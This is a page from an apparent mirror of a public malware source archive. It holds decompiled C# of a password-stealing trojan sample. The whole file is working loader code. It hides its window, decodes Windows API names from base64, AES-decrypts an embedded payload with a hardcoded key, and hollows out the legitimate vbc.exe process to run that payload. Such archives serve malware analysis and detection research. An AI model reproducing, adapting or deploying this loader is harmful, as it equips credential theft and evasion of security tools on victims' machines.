mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
f2ac1ece55
add
237 lines
11 KiB
C#
237 lines
11 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Program.Main
|
|
// Assembly: kripted, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: F2186B1A-2E99-4A23-AA3D-671873E0755D
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-PSW.Win32.Chisburg.whx-d16332af030d1b00f8f014c06b4e039d4e412ad6c23b4d921524f9a3e027784f.exe
|
|
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using System;
|
|
using System.ComponentModel;
|
|
using System.Diagnostics;
|
|
using System.Drawing;
|
|
using System.Runtime.CompilerServices;
|
|
using System.Runtime.InteropServices;
|
|
using System.Security.Cryptography;
|
|
using System.Text;
|
|
using System.Windows.Forms;
|
|
|
|
namespace Program
|
|
{
|
|
public class Main : Form
|
|
{
|
|
private IContainer Components;
|
|
private StringBuilder đžhuxHŠhBqYDXmćIi;
|
|
|
|
[STAThread]
|
|
public static void Main() => Application.Run((Form) new Program.Main());
|
|
|
|
public Main()
|
|
{
|
|
this.Load += new EventHandler(this.Main_Load);
|
|
this.đžhuxHŠhBqYDXmćIi = new StringBuilder();
|
|
Application.EnableVisualStyles();
|
|
this.InitializeComponent();
|
|
this.SuspendLayout();
|
|
this.AutoScaleDimensions = new SizeF(6f, 13f);
|
|
this.AutoScaleMode = AutoScaleMode.Font;
|
|
this.ClientSize = new Size(1, 1);
|
|
this.Opacity = 0.0;
|
|
this.ShowInTaskbar = false;
|
|
this.Name = nameof (Main);
|
|
this.Text = nameof (Main);
|
|
this.ResumeLayout(false);
|
|
this.PerformLayout();
|
|
}
|
|
|
|
protected override void Dispose(bool Disposing)
|
|
{
|
|
if (Disposing && this.Components != null)
|
|
this.Components.Dispose();
|
|
base.Dispose(Disposing);
|
|
}
|
|
|
|
[DebuggerStepThrough]
|
|
private void InitializeComponent()
|
|
{
|
|
}
|
|
|
|
public byte[] oBŠCJfŠIgbTTšNvribUA(byte[] NiwjwQĆNFSđZYšWnNw)
|
|
{
|
|
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
|
|
{
|
|
rijndaelManaged.IV = new byte[16]
|
|
{
|
|
(byte) 5,
|
|
(byte) 8,
|
|
(byte) 8,
|
|
(byte) 6,
|
|
(byte) 7,
|
|
(byte) 7,
|
|
(byte) 3,
|
|
(byte) 1,
|
|
(byte) 5,
|
|
(byte) 2,
|
|
(byte) 5,
|
|
(byte) 6,
|
|
(byte) 4,
|
|
(byte) 7,
|
|
(byte) 3,
|
|
(byte) 4
|
|
};
|
|
rijndaelManaged.Key = new byte[16]
|
|
{
|
|
(byte) 4,
|
|
(byte) 3,
|
|
(byte) 7,
|
|
(byte) 4,
|
|
(byte) 6,
|
|
(byte) 5,
|
|
(byte) 2,
|
|
(byte) 5,
|
|
(byte) 1,
|
|
(byte) 3,
|
|
(byte) 7,
|
|
(byte) 7,
|
|
(byte) 6,
|
|
(byte) 8,
|
|
(byte) 8,
|
|
(byte) 5
|
|
};
|
|
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(NiwjwQĆNFSđZYšWnNw, 0, NiwjwQĆNFSđZYšWnNw.Length);
|
|
}
|
|
}
|
|
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
|
|
|
|
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr GetProcAddress(IntPtr handle, [MarshalAs(UnmanagedType.VBByRefStr)] ref string name);
|
|
|
|
public T RđckvLgĐvXvrvosŠČK<T>(string name, string method) => (T) Marshal.GetDelegateForFunctionPointer(Program.Main.GetProcAddress(Program.Main.LoadLibraryA(ref name), ref method), typeof (T));
|
|
|
|
public bool bXwlfCFJQbtsuorRQbi(byte[] ZOkCiOcinđžXZđKuOk, string HwČećNđDAUctfmXzHOz)
|
|
{
|
|
Program.Main.DQđlyZXQKUljwcsižj dqđlyZxqkUljwcsižj = this.RđckvLgĐvXvrvosŠČK<Program.Main.DQđlyZXQKUljwcsižj>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E=")));
|
|
Program.Main.KćHŠććvBVeZFNTHhnV hšććvBveZfntHhnV = this.RđckvLgĐvXvrvosŠČK<Program.Main.KćHŠććvBVeZFNTHhnV>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA==")));
|
|
Program.Main.fbođRGšŽcnČGpUycĐšĆ fbođRgšŽcnČgpUycĐšĆ = this.RđckvLgĐvXvrvosŠČK<Program.Main.fbođRGšŽcnČGpUycĐšĆ>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk=")));
|
|
Program.Main.DćgbvŽfweaihibVilWoB dćgbvŽfweaihibVilWoB = this.RđckvLgĐvXvrvosŠČK<Program.Main.DćgbvŽfweaihibVilWoB>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg=")));
|
|
Program.Main.yŽĐJlaškvrrkćlOgtq žđJlaškvrrkćlOgtq = this.RđckvLgĐvXvrvosŠČK<Program.Main.yŽĐJlaškvrrkćlOgtq>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5")));
|
|
Program.Main.ŠvlWžNWILiTčŠUUA švlWžNwiLiTčŠuua = this.RđckvLgĐvXvrvosŠČK<Program.Main.ŠvlWžNWILiTčŠUUA>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA==")));
|
|
Program.Main.ĆFnoPrdvŽĐPkđšwLGđm ćfnoPrdvŽđPkđšwLgđm = this.RđckvLgĐvXvrvosŠČK<Program.Main.ĆFnoPrdvŽĐPkđšwLGđm>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk")));
|
|
Program.Main.ŠĆJĐčAPHHCodtSuo šćjĐčAphhCodtSuo = this.RđckvLgĐvXvrvosŠČK<Program.Main.ŠĆJĐčAPHHCodtSuo>(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24=")));
|
|
bool flag;
|
|
try
|
|
{
|
|
IntPtr zero1 = IntPtr.Zero;
|
|
IntPtr[] pĐUfJxXošTsYUQdVGx = new IntPtr[4];
|
|
byte[] yDoemFćaqJkćčIWLkh = new byte[68];
|
|
int int32_1 = BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, 60);
|
|
int int16 = (int) BitConverter.ToInt16(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 6));
|
|
IntPtr xDhpđBqŠIbJnLqEB = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 84)));
|
|
if (dqđlyZxqkUljwcsižj((string) null, new StringBuilder(HwČećNđDAUctfmXzHOz), zero1, zero1, false, 4, zero1, (string) null, yDoemFćaqJkćčIWLkh, pĐUfJxXošTsYUQdVGx))
|
|
{
|
|
uint[] numArray1 = new uint[179];
|
|
numArray1[0] = 65538U;
|
|
if (hšććvBveZfntHhnV(pĐUfJxXošTsYUQdVGx[1], numArray1))
|
|
{
|
|
IntPtr lHYtcldUušXrccECW = new IntPtr(checked ((long) numArray1[41] + 8L));
|
|
IntPtr zero2 = IntPtr.Zero;
|
|
IntPtr žEdXtvpRfDeJABydđZz = new IntPtr(4);
|
|
IntPtr zero3 = IntPtr.Zero;
|
|
if (fbođRgšŽcnČgpUycĐšĆ(pĐUfJxXošTsYUQdVGx[0], lHYtcldUušXrccECW, ref zero2, (int) žEdXtvpRfDeJABydđZz, ref zero3) && šćjĐčAphhCodtSuo(pĐUfJxXošTsYUQdVGx[0], zero2) == 0U)
|
|
{
|
|
IntPtr num1 = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 52)));
|
|
IntPtr num2 = new IntPtr(BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, checked (int32_1 + 80)));
|
|
IntPtr ŽACĐbXomGGšŠAVyLčUć = dćgbvŽfweaihibVilWoB(pĐUfJxXošTsYUQdVGx[0], num1, num2, 12288, 64);
|
|
int int32_2 = ŽACĐbXomGGšŠAVyLčUć.ToInt32();
|
|
int čePWVČDEEĐrEBwPNTHUs;
|
|
int num3 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], ŽACĐbXomGGšŠAVyLčUć, ZOkCiOcinđžXZđKuOk, checked ((uint) (int) xDhpđBqŠIbJnLqEB), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0;
|
|
int num4 = checked (int16 - 1);
|
|
int num5 = 0;
|
|
while (num5 <= num4)
|
|
{
|
|
int[] dst = new int[10];
|
|
Buffer.BlockCopy((Array) ZOkCiOcinđžXZđKuOk, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40);
|
|
byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)];
|
|
Buffer.BlockCopy((Array) ZOkCiOcinđžXZđKuOk, dst[5], (Array) numArray2, 0, numArray2.Length);
|
|
num2 = new IntPtr(checked (int32_2 + dst[3]));
|
|
num1 = new IntPtr(numArray2.Length);
|
|
int num6 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], num2, numArray2, checked ((uint) (int) num1), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0;
|
|
checked { ++num5; }
|
|
}
|
|
num2 = new IntPtr(checked ((long) numArray1[41] + 8L));
|
|
num1 = new IntPtr(4);
|
|
int num7 = žđJlaškvrrkćlOgtq(pĐUfJxXošTsYUQdVGx[0], num2, BitConverter.GetBytes(ŽACĐbXomGGšŠAVyLčUć.ToInt32()), checked ((uint) (int) num1), čePWVČDEEĐrEBwPNTHUs) ? 1 : 0;
|
|
numArray1[44] = checked ((uint) (ŽACĐbXomGGšŠAVyLčUć.ToInt32() + BitConverter.ToInt32(ZOkCiOcinđžXZđKuOk, int32_1 + 40)));
|
|
int num8 = švlWžNwiLiTčŠuua(pĐUfJxXošTsYUQdVGx[1], numArray1) ? 1 : 0;
|
|
}
|
|
}
|
|
int num = (int) ćfnoPrdvŽđPkđšwLgđm(pĐUfJxXošTsYUQdVGx[1]);
|
|
}
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
flag = false;
|
|
ProjectData.ClearProjectError();
|
|
goto label_11;
|
|
}
|
|
flag = true;
|
|
label_11:
|
|
return flag;
|
|
}
|
|
|
|
private void Main_Load(object sender, EventArgs e)
|
|
{
|
|
RuntimeHelpers.GetObjectValue(My.Resources.Resources.ResourceManager.GetObject("glavni"));
|
|
this.bXwlfCFJQbtsuorRQbi(this.oBŠCJfŠIgbTTšNvribUA(My.Resources.Resources.glavni), Encoding.UTF8.GetString(Convert.FromBase64String("QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XHZiYy5leGU=")));
|
|
this.Close();
|
|
}
|
|
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
public delegate bool DQđlyZXQKUljwcsižj(
|
|
string čuxXhččVĐćLVmnĐšbwu,
|
|
StringBuilder edbBlGCđplćZwQcrUĆOI,
|
|
IntPtr ZešwZPIyvHvČoZSIvPbh,
|
|
IntPtr JvNšXNeORĆabqvgj,
|
|
[MarshalAs(UnmanagedType.Bool)] bool PšgJŽvLFAYRxštšfXJZš,
|
|
int PPTČSttjioRfnqhNktqč,
|
|
IntPtr etbčaPćotOĆiuNmĆe,
|
|
string sĐRLLqtŠrSfPĆTCQUZiQ,
|
|
byte[] yDoemFćaqJkćčIWLkh,
|
|
IntPtr[] pĐUfJxXošTsYUQdVGx);
|
|
|
|
public delegate bool yŽĐJlaškvrrkćlOgtq(
|
|
IntPtr ĐlwXQfNHBwoŠRTDEŽačw,
|
|
IntPtr ŽACĐbXomGGšŠAVyLčUć,
|
|
byte[] ŠFOAwCVyIjjnIfNszč,
|
|
uint xDhpđBqŠIbJnLqEB,
|
|
int čePWVČDEEĐrEBwPNTHUs);
|
|
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
public delegate bool fbođRGšŽcnČGpUycĐšĆ(
|
|
IntPtr pQkBZjĐEfmajnfFmXpz,
|
|
IntPtr lHYtcldUušXrccECW,
|
|
ref IntPtr JAŽšjKhuhXmEvtpgad,
|
|
int žEdXtvpRfDeJABydđZz,
|
|
ref IntPtr iLgVciRŽDAuežfgVvB);
|
|
|
|
public delegate IntPtr DćgbvŽfweaihibVilWoB(
|
|
IntPtr ĐmWmčWeAZHČČCvEPoĐšv,
|
|
IntPtr LRQdkćŽJĐFĆhQŠcčZbKn,
|
|
IntPtr rfšOKXhžUsgćVCXw,
|
|
int VggzYBwvcLixWćyV,
|
|
int ĐčfŽmhxZzbytRČmćvmv);
|
|
|
|
public delegate uint ŠĆJĐčAPHHCodtSuo(IntPtr RkĆBxđLGeUVpEšgrzĐ, IntPtr HnyšxĆUjĐyKlfračlI);
|
|
|
|
public delegate uint ĆFnoPrdvŽĐPkđšwLGđm(IntPtr ĆožBčliZRrŽBŽhGnvćy);
|
|
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
public delegate bool KćHŠććvBVeZFNTHhnV(IntPtr kpFhettcmCyČfjOdJJQ, uint[] IRĐeHIAPŽAPŽdRehh);
|
|
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
public delegate bool ŠvlWžNWILiTčŠUUA(IntPtr VScŽcČqZRPvYćBdaXK, uint[] ĐhQNPoXaĆsDDČrmP);
|
|
}
|
|
}
|